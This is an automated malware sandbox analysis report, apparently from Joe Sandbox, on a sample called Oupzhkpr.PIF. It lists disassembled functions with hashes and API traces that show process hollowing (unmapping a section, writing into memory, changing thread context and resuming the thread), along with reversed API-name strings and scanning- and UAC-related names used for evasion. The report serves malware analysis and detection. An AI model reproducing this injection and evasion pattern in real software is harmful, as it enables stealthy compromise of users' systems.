Opcode Fuzzy Hash: d236979f14765d059742ff0ec6ef311e70b88de38bd0480bc120b7d6a36f0158
Instruction Fuzzy Hash: 065156B1706306AFDB245A6D8800766BBBAEFC2765F24842BD845CB341DA35C885C7E1

Function 03187A21 Relevance: 5.2, Strings: 4, Instructions: 241COMMON

Download Yara Rule

Strings

`^q, xrefs: 03187C44
`^q, xrefs: 03187CC2
`^q, xrefs: 03187BA2
`^q, xrefs: 03187B23

Memory Dump Source

Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3180000_powershell.jbxd

Similarity

API ID:
String ID: `^q$`^q$`^q$`^q
API String ID: 0-4294711580
Opcode ID: 334adadba694f5a6c793859268907bc32ef311b632c7ee8f6635494cebbd896c
Instruction ID: 7af7c3cb301a456173c9eabb933eb625e4e3444197382bac13b17ef05e2af8d8
Opcode Fuzzy Hash: 334adadba694f5a6c793859268907bc32ef311b632c7ee8f6635494cebbd896c
Instruction Fuzzy Hash: E0B1A574E012099FCB54DFA9D990A9DFBF6FF88300F248629D819AB354DB34A945CF90

Function 03187A30 Relevance: 5.2, Strings: 4, Instructions: 234COMMON

Download Yara Rule

Strings

`^q, xrefs: 03187C44
`^q, xrefs: 03187CC2
`^q, xrefs: 03187BA2
`^q, xrefs: 03187B23

Memory Dump Source

Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3180000_powershell.jbxd

Similarity

API ID:
String ID: `^q$`^q$`^q$`^q
API String ID: 0-4294711580
Opcode ID: f96587213cc792e779460d5f979856110ae2d99f2f4f44b6924b874871316927
Instruction ID: a71f85ba7be115658c0c518f4d75ba3f76da2aa4a118f9423e29b6ff1c33bd00
Opcode Fuzzy Hash: f96587213cc792e779460d5f979856110ae2d99f2f4f44b6924b874871316927
Instruction Fuzzy Hash: CDB1A574E012099FCB54DFA9D990A9DFBF6FF88300F248629D819AB354DB34A945CF90

Function 03187210 Relevance: 5.2, Strings: 4, Instructions: 203COMMON

Download Yara Rule

Strings

`^q, xrefs: 03187C44
`^q, xrefs: 03187CC2
`^q, xrefs: 03187BA2
`^q, xrefs: 03187B23

Memory Dump Source

Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3180000_powershell.jbxd

Similarity

API ID:
String ID: `^q$`^q$`^q$`^q
API String ID: 0-4294711580
Opcode ID: c81bd4ff1d1e03dd3381e0360c24ab6a929deb8493037178391ddeff6d4f25fe
Instruction ID: d3d417511064893c75625dbbf59601da2c37a81da3973a33fa720d017c5b20c6
Opcode Fuzzy Hash: c81bd4ff1d1e03dd3381e0360c24ab6a929deb8493037178391ddeff6d4f25fe
Instruction Fuzzy Hash: 21919374E012199FCB54DFA9D990A9DFBF5FF48300F20862AE819AB354E734A945CF90

Function 079A5798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$]q, xrefs: 079A57AA
$]q, xrefs: 079A5800
$]q, xrefs: 079A57F4
$]q, xrefs: 079A57C6

Memory Dump Source

Source File: 0000000A.00000002.2323119219.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 85be3ec1dcc82205bd068a987fdb44e8f9653009c0e6409993d0779c31a22131
Instruction ID: 27e669a1358a714d54c0d9457e404c94e65dbdd3443ef3cee471c889e3721450
Opcode Fuzzy Hash: 85be3ec1dcc82205bd068a987fdb44e8f9653009c0e6409993d0779c31a22131
Instruction Fuzzy Hash: A9216BB1315306BBDB38552E9840B2BB7DFAFC0719F25883AA905CB381DD75C850C3A1

Function 079A030A Relevance: 5.1, Strings: 4, Instructions: 65COMMON

Download Yara Rule

Strings

$]q, xrefs: 079A0352
4']q, xrefs: 079A037F
$]q, xrefs: 079A035E
4']q, xrefs: 079A0373

Memory Dump Source

Source File: 0000000A.00000002.2323119219.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q
API String ID: 0-978391646
Opcode ID: 5a5dc9a32eee7eac5dcd2e99eda6a0a9177c9f117607942ca75b0c5da16cc7d9
Instruction ID: 0dcbe0329fd3aca23db91b5bf85c7668021e793882554a0845ded98344de0a3c
Opcode Fuzzy Hash: 5a5dc9a32eee7eac5dcd2e99eda6a0a9177c9f117607942ca75b0c5da16cc7d9
Instruction Fuzzy Hash: 9111AFB1F0A7526FC72E523C5970379ABAE9FC5554F1D05E6C081CB262ED188C0283D7

Analysis Process: Oupzhkpr.PIFPID: 4824, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	9.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	187
Total number of Limit Nodes:	17

Executed Functions

Function 02848BB0 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654
threadnativeinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02848824: FreeLibrary.KERNEL32(02891384,00000000,02891388,Function_000055D8,00000004,02891398,02891388,05F5E0FF,00000040,0289139C,02891384,00000000,00000000,00000000,00000000,0284890B), ref: 028488EB

Part of subcall function 028485DC: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02848668

GetThreadContext.KERNEL32(028913D0,02891420,ScanString,028913A4,0284A77C,UacInitialize,028913A4,0284A77C,ScanBuffer,028913A4,0284A77C,ScanBuffer,028913A4,0284A77C,UacInitialize,028913A4), ref: 02849442

Part of subcall function 02848254: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 028482C5

Part of subcall function 028484C4: NtUnmapViewOfSection.NTDLL(?,?), ref: 02848529

Part of subcall function 028479B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02847A27

Part of subcall function 02847D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02847D74

SetThreadContext.KERNEL32(028913D0,02891420,ScanBuffer,028913A4,0284A77C,ScanString,028913A4,0284A77C,Initialize,028913A4,0284A77C,028913CC,028914BC,028914F8,00000004,028914FC), ref: 0284A157
NtResumeThread.NTDLL(028913D0,00000000), ref: 0284A164

Part of subcall function 028487A0: LoadLibraryW.KERNEL32(?,?), ref: 028487B4
Part of subcall function 028487A0: GetProcAddress.KERNEL32(02891390,BCryptVerifySignature), ref: 028487CE
Part of subcall function 028487A0: FreeLibrary.KERNEL32(02891390,02891390,BCryptVerifySignature,bcrypt,?,028913D0,00000000,028913A4,0284A3C7,ScanString,028913A4,0284A77C,ScanBuffer,028913A4,0284A77C,Initialize), ref: 0284880A

Strings

dbgcore, xrefs: 0284A559, 0284A56D
BCryptRegisterProvider, xrefs: 0284A3DB
MiniDumpReadDumpStream, xrefs: 0284A568
ScanString, xrefs: 02848C42, 02848DED, 02848F9B, 028493C3, 028495A9, 02849730, 02849BBD, 02849D7B, 02849EEB, 0284A05E, 0284A349, 0284A3F6
BCryptVerifySignature, xrefs: 0284A3B3
sppc, xrefs: 028491B6
OpenSession, xrefs: 02848BE9, 0284900C, 028490BE, 0284A48F, 0284A5D5
NtReadVirtualMemory, xrefs: 0284A460
NtOpenObjectAuditAlarm, xrefs: 0284A474, 0284A52C
UacInitialize, xrefs: 02848E72, 028491D3, 02849352, 02849456, 02849852, 028499C6, 0284A170
bcrypt, xrefs: 0284A3B8, 0284A3CC, 0284A3E0
MiniDumpWriteDump, xrefs: 0284A554
NtSetSecurityObject, xrefs: 0284A6CF
UacScan, xrefs: 02848CB3, 02848ECB, 028494C7, 028498C3, 02849A37, 0284A1E1, 0284A679
ntdll, xrefs: 0284A465, 0284A479, 0284A531, 0284A6D4, 0284A6E8
NtOpenProcess, xrefs: 0284A6E3
ScanBuffer, xrefs: 02848D0C, 02848D94, 0284912F, 02849244, 028492E1, 0284961A, 028497A1, 02849934, 02849B19, 02849C2E, 02849DEC, 02849F5C, 0284A0CF, 0284A2C3, 0284A4E1, 0284A627
SLGetLicenseInformation, xrefs: 0284919F
Initialize, xrefs: 02848F2A, 02849538, 028496BF, 02849AA8, 02849D0A, 02849E7A, 02849FED, 0284A252, 0284A583
I_QueryTagInformation, xrefs: 0284A540
advapi32, xrefs: 0284A545
BCryptQueryProviderRegistration, xrefs: 0284A3C7

Memory Dump Source

Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd

Similarity

API ID: LibraryMemoryThreadVirtual$ContextFree$AddressAllocateCreateLoadProcProcessReadResumeSectionUnmapUserViewWrite
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 2388221946-51457883
Opcode ID: 205fe1893eca31b7d32816b4465447dd19ff8a241d0b1ae63bbdb5cc3286051b
Instruction ID: 8e7170226f045b3995d43ffce67947eedc9d119ea749bd4db5325024d5e5ae18
Opcode Fuzzy Hash: 205fe1893eca31b7d32816b4465447dd19ff8a241d0b1ae63bbdb5cc3286051b
Instruction Fuzzy Hash: 69E21E7CA5011C9BEB16EB68CC90EDE73BAEF49310F1040A1E549EB315DE74AE458F92

Function 02848BAE Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02848824: FreeLibrary.KERNEL32(02891384,00000000,02891388,Function_000055D8,00000004,02891398,02891388,05F5E0FF,00000040,0289139C,02891384,00000000,00000000,00000000,00000000,0284890B), ref: 028488EB

Part of subcall function 028485DC: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02848668

GetThreadContext.KERNEL32(028913D0,02891420,ScanString,028913A4,0284A77C,UacInitialize,028913A4,0284A77C,ScanBuffer,028913A4,0284A77C,ScanBuffer,028913A4,0284A77C,UacInitialize,028913A4), ref: 02849442

Part of subcall function 02848254: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 028482C5

Part of subcall function 028484C4: NtUnmapViewOfSection.NTDLL(?,?), ref: 02848529

Part of subcall function 028479B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02847A27

Strings

dbgcore, xrefs: 0284A559, 0284A56D
BCryptRegisterProvider, xrefs: 0284A3DB
MiniDumpReadDumpStream, xrefs: 0284A568
ScanString, xrefs: 02848C42, 02848DED, 02848F9B, 028493C3, 028495A9, 02849730, 02849BBD, 02849D7B, 02849EEB, 0284A05E, 0284A349, 0284A3F6
BCryptVerifySignature, xrefs: 0284A3B3
sppc, xrefs: 028491B6
OpenSession, xrefs: 02848BE9, 0284900C, 028490BE, 0284A48F, 0284A5D5
NtReadVirtualMemory, xrefs: 0284A460
NtOpenObjectAuditAlarm, xrefs: 0284A474, 0284A52C
UacInitialize, xrefs: 02848E72, 028491D3, 02849352, 02849456, 0284A170
bcrypt, xrefs: 0284A3B8, 0284A3CC, 0284A3E0
MiniDumpWriteDump, xrefs: 0284A554
NtSetSecurityObject, xrefs: 0284A6CF
UacScan, xrefs: 02848CB3, 02848ECB, 028494C7, 028498C3, 02849A37, 0284A1E1, 0284A679
ntdll, xrefs: 0284A465, 0284A479, 0284A531, 0284A6D4, 0284A6E8
NtOpenProcess, xrefs: 0284A6E3
ScanBuffer, xrefs: 02848D0C, 02848D94, 0284912F, 02849244, 028492E1, 0284961A, 028497A1, 02849934, 02849B19, 02849C2E, 02849DEC, 02849F5C, 0284A0CF, 0284A2C3, 0284A4E1, 0284A627
SLGetLicenseInformation, xrefs: 0284919F
Initialize, xrefs: 02848F2A, 02849538, 028496BF, 02849AA8, 02849D0A, 02849E7A, 02849FED, 0284A252, 0284A583
I_QueryTagInformation, xrefs: 0284A540
advapi32, xrefs: 0284A545
BCryptQueryProviderRegistration, xrefs: 0284A3C7

Memory Dump Source

Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd

Similarity

API ID: MemoryVirtual$AllocateContextCreateFreeLibraryProcessReadSectionThreadUnmapUserView
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 3386062106-51457883
Opcode ID: 9d954e3c3b8be2db2bbb0cfd7cd766049b36ffefb6df12526a585d8b69b35fa3
Instruction ID: 030bc8779b19bf47991997729b795857eefe64e22657f984641f0f1129a4ce32
Opcode Fuzzy Hash: 9d954e3c3b8be2db2bbb0cfd7cd766049b36ffefb6df12526a585d8b69b35fa3
Instruction Fuzzy Hash: 67E21D7CA5011C9BEB16EB68CC90EDE73BAEF49310F1040A1E549EB315DE74AE458F92

Function 02835A78 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 02835A94
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02835AB2
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02835AD0
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02835AEE
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02835B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02835B37
RegQueryValueExA.ADVAPI32(?,02835CE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02835B7D,?,80000001), ref: 02835B55
RegCloseKey.ADVAPI32(?,02835B84,00000000,00000000,00000005,00000000,02835B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02835B77
lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02835B94
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105), ref: 02835BA1
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105), ref: 02835BA7
lstrlen.KERNEL32(00000000), ref: 02835BD2
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02835C19
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02835C29
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02835C51
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02835C61
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02835C87
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02835C97

Strings

Software\Borland\Delphi\Locales, xrefs: 02835AE4
Software\Borland\Locales, xrefs: 02835AA8, 02835AC6
., xrefs: 02835BE4

Memory Dump Source

Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-3917250287
Opcode ID: 9f1ce140d8f699e697d70b86599326aba6c91981959300a1c886c2ed7f42b67d
Instruction ID: 7d31e59b48b37cb6463214799bd9763412aac47acce82f12393674953d37a350
Opcode Fuzzy Hash: 9f1ce140d8f699e697d70b86599326aba6c91981959300a1c886c2ed7f42b67d
Instruction Fuzzy Hash: 77519C7DA4024C7EFB22D6A8CC46FEF77BD9B08744F8005A1A608E6181D7789A44CFE5

Function 028479B2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02848020: GetModuleHandleA.KERNELBASE(?), ref: 02848072

Part of subcall function 028480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0284811B
Part of subcall function 028480C8: GetProcAddress.KERNEL32(?,?), ref: 0284812D

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02847A27

Strings

yromeMlautriVetacollAwZ, xrefs: 028479CF
ntdll, xrefs: 028479FC

Memory Dump Source

Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd

Similarity

API ID: AddressProc$AllocateHandleMemoryModuleVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 1888340430-445027087
Opcode ID: 42201f8186150d56e7a3448432414ee77fdc9381937ca28c009acf87a403715f
Instruction ID: fb243b65879693ef83ff771a887412645d86d1b1bc36d7f002a0ca54db077543
Opcode Fuzzy Hash: 42201f8186150d56e7a3448432414ee77fdc9381937ca28c009acf87a403715f
Instruction Fuzzy Hash: 23116D7D60420CAFEB01EFA8DC81E9EB7BDEB4C710F418861B904D7680DB74EA148B61

Function 028479B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02848020: GetModuleHandleA.KERNELBASE(?), ref: 02848072

Part of subcall function 028480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0284811B
Part of subcall function 028480C8: GetProcAddress.KERNEL32(?,?), ref: 0284812D

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02847A27

Strings

yromeMlautriVetacollAwZ, xrefs: 028479CF
ntdll, xrefs: 028479FC

Memory Dump Source

Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd

Similarity

API ID: AddressProc$AllocateHandleMemoryModuleVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 1888340430-445027087
Opcode ID: 293d32187f7aba0ac61e92a8ab0c94d637e78dc88151e713830f8abb9929ff3f
Instruction ID: 2063cfff256473f9f9b525158f8cc6f140d88db41f1119106536f939daa0bace
Opcode Fuzzy Hash: 293d32187f7aba0ac61e92a8ab0c94d637e78dc88151e713830f8abb9929ff3f
Instruction Fuzzy Hash: 96116D7D60420CAFEB01EFA8DC81E9EB7BDEB4C710F418861B904D7680DB74AA148B61

Function 02848254 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02848020: GetModuleHandleA.KERNELBASE(?), ref: 02848072

Part of subcall function 028480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0284811B
Part of subcall function 028480C8: GetProcAddress.KERNEL32(?,?), ref: 0284812D

NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 028482C5

Strings

ntdll, xrefs: 0284829C
yromeMlautriVdaeRtN, xrefs: 0284826F

Memory Dump Source

Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd

Similarity

API ID: AddressProc$HandleMemoryModuleReadVirtual
String ID: ntdll$yromeMlautriVdaeRtN
API String ID: 36784810-737317276
Opcode ID: 0800cda7d1901eba27241a1c261e252496bf0eb19fdc328cee7e5e837a041204
Instruction ID: f33f3053f4ed84bf60c18b0aa830cf207c349d261dc0f7fdaece8fc9390a74a2
Opcode Fuzzy Hash: 0800cda7d1901eba27241a1c261e252496bf0eb19fdc328cee7e5e837a041204
Instruction Fuzzy Hash: F9016D7D604208AFEB00EFA8DC41E5E77EEEB48700F454460F908D7640DA78A9109B65

Function 0284DACC Relevance: 4.6, APIs: 3, Instructions: 80nativefileCOMMON

Download Yara Rule

APIs

RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 0284DB0B
NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0284DB72
NtClose.NTDLL(?), ref: 0284DB7B

Memory Dump Source

Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd

Similarity

API ID: Path$CloseFileNameName_Write
String ID:
API String ID: 1792072161-0
Opcode ID: 82860ca687eac46afe321229846b939be6fd8941a7c96ba0be63a213ae3b7e3f
Instruction ID: 51ee3cd47ac09682cd62ef804454aef7264397822d3a29f8580268f03788961c
Opcode Fuzzy Hash: 82860ca687eac46afe321229846b939be6fd8941a7c96ba0be63a213ae3b7e3f
Instruction Fuzzy Hash: AC21C179A4030CBBEB11EAE8CD46F9EB7BDEB04B14F504461B604F71D0DBB46E048A96

Function 0284D9F0 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON

Download Yara Rule

APIs

RtlInitUnicodeString.NTDLL ref: 0284DA6C
RtlDosPathNameToNtPathName_U.NTDLL(00000000,00000000,00000000,00000000), ref: 0284DA82
NtDeleteFile.NTDLL(?), ref: 0284DAA1

Memory Dump Source

Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd

Similarity

API ID: Path$DeleteFileInitNameName_StringUnicode
String ID:
API String ID: 1459852867-0
Opcode ID: 97311c2412812b380f08521188bae99ed0de798ce78c0aa4d3d47d1892d70ff4
Instruction ID: cf2c6d7c2d7e210326c788a34b89cf5668a6459b9851272470bf024e78c24ea1
Opcode Fuzzy Hash: 97311c2412812b380f08521188bae99ed0de798ce78c0aa4d3d47d1892d70ff4
Instruction Fuzzy Hash: 11014F7D90824CAFEB06EAA48941BCD77B9AB45704F5000939240E6082DF74AB148B66

Function 0284DA44 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON

Download Yara Rule

APIs

RtlInitUnicodeString.NTDLL ref: 0284DA6C
RtlDosPathNameToNtPathName_U.NTDLL(00000000,00000000,00000000,00000000), ref: 0284DA82
NtDeleteFile.NTDLL(?), ref: 0284DAA1

Part of subcall function 02834C0C: SysFreeString.OLEAUT32(?), ref: 02834C1A

Memory Dump Source

Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd

Similarity

API ID: PathString$DeleteFileFreeInitNameName_Unicode
String ID:
API String ID: 2256775434-0
Opcode ID: f33779f7ce2e41976a921b2e3bad5cca291c3d8bde5ae72dadf4bf6fc8dac801
Instruction ID: 3f1fd498e678a75a7a03195ff0f445243aff5b33e9ec0eaad2ad750f2d91a6b0
Opcode Fuzzy Hash: f33779f7ce2e41976a921b2e3bad5cca291c3d8bde5ae72dadf4bf6fc8dac801
Instruction Fuzzy Hash: 5601E17D90420CABEB11EAE4CD51FCEB3BDEB48710F504462E600E6180EB74AB148A65

Function 0284DBB0 Relevance: 3.1, APIs: 2, Instructions: 80nativeCOMMON

Download Yara Rule

APIs

RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 0284DBEB
NtClose.NTDLL(?), ref: 0284DC65

Part of subcall function 02834C0C: SysFreeString.OLEAUT32(?), ref: 02834C1A

Memory Dump Source

Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd

Similarity

API ID: Path$CloseFreeNameName_String
String ID:
API String ID: 11680810-0
Opcode ID: f8e673397d58b04208dc94c41b445988dbb44e1f1159ea794c35b10d1382f758
Instruction ID: dd9477f70990ff44816c6493ac3991e1d69eb6f1d366ca4eb69ac9a0ad35b87c
Opcode Fuzzy Hash: f8e673397d58b04208dc94c41b445988dbb44e1f1159ea794c35b10d1382f758
Instruction Fuzzy Hash: A621C47965070C7BEB11EAD8CC46FDE77BDAB48700F504461B600F71C1DAB4AA058BA6

Function 02857877 Relevance: 162.0, APIs: 5, Strings: 86, Instructions: 2772
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02848824: FreeLibrary.KERNEL32(02891384,00000000,02891388,Function_000055D8,00000004,02891398,02891388,05F5E0FF,00000040,0289139C,02891384,00000000,00000000,00000000,00000000,0284890B), ref: 028488EB

CreateProcessAsUserW.ADVAPI32(029857D8,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,029857DC,02985820,OpenSession,0288CE80,0285AFD8,UacScan,0288CE80), ref: 02857E39
ResumeThread.KERNEL32(02985824,ScanBuffer,0288CE80,0285AFD8,OpenSession,0288CE80,0285AFD8,UacScan,0288CE80,0285AFD8,ScanBuffer,0288CE80,0285AFD8,OpenSession,0288CE80,0285AFD8), ref: 02858483
CloseHandle.KERNEL32(02985820,ScanBuffer,0288CE80,0285AFD8,OpenSession,0288CE80,0285AFD8,UacScan,0288CE80,0285AFD8,02985824,ScanBuffer,0288CE80,0285AFD8,OpenSession,0288CE80), ref: 02858602

Part of subcall function 028487A0: LoadLibraryW.KERNEL32(?,?), ref: 028487B4
Part of subcall function 028487A0: GetProcAddress.KERNEL32(02891390,BCryptVerifySignature), ref: 028487CE
Part of subcall function 028487A0: FreeLibrary.KERNEL32(02891390,02891390,BCryptVerifySignature,bcrypt,?,028913D0,00000000,028913A4,0284A3C7,ScanString,028913A4,0284A77C,ScanBuffer,028913A4,0284A77C,Initialize), ref: 0284880A

CloseHandle.KERNEL32(02985820,02985820,ScanBuffer,0288CE80,0285AFD8,UacInitialize,0288CE80,0285AFD8,ScanBuffer,0288CE80,0285AFD8,OpenSession,0288CE80,0285AFD8,UacScan,0288CE80), ref: 028589F4

Part of subcall function 0284DACC: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 0284DB0B
Part of subcall function 0284DACC: NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0284DB72
Part of subcall function 0284DACC: NtClose.NTDLL(?), ref: 0284DB7B

Part of subcall function 0284818C: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02848216), ref: 028481F8

ExitProcess.KERNEL32(00000000,OpenSession,0288CE80,0285AFD8,ScanBuffer,0288CE80,0285AFD8,Initialize,0288CE80,0285AFD8,00000000,00000000,00000000,ScanString,0288CE80,0285AFD8), ref: 0285AA25

Strings

OpenProcess, xrefs: 0285A29D
NtOpenFile, xrefs: 0285A80D
SLGatherMigrationBlob, xrefs: 0285A543
WriteVirtualMemory, xrefs: 0285A2D0
DlpCheckIsCloudSyncApp, xrefs: 02859BAB
VirtualAlloc, xrefs: 0285A204
tquery, xrefs: 028597F1
C:\Windows\System32\, xrefs: 02857E03
NtReadVirtualMemory, xrefs: 0285A6DB
CreateProcessA, xrefs: 0285A128
Kernel32, xrefs: 0285A12D, 0285A13C, 0285A178
advapi32, xrefs: 0285898F
BCryptVerifySignature, xrefs: 028599D1
UacScan, xrefs: 02857B6C, 02857CF5, 02857E4E, 02857FF4, 02858181, 02858315, 02858494, 0285870B, 02858B79, 02858D93, 02858F74, 028590E8, 0285931E, 0285A18E
bcrypt, xrefs: 028599E8
SLLoadApplicationPolicies, xrefs: 02859633
GetProcessMemoryInfo, xrefs: 02859873
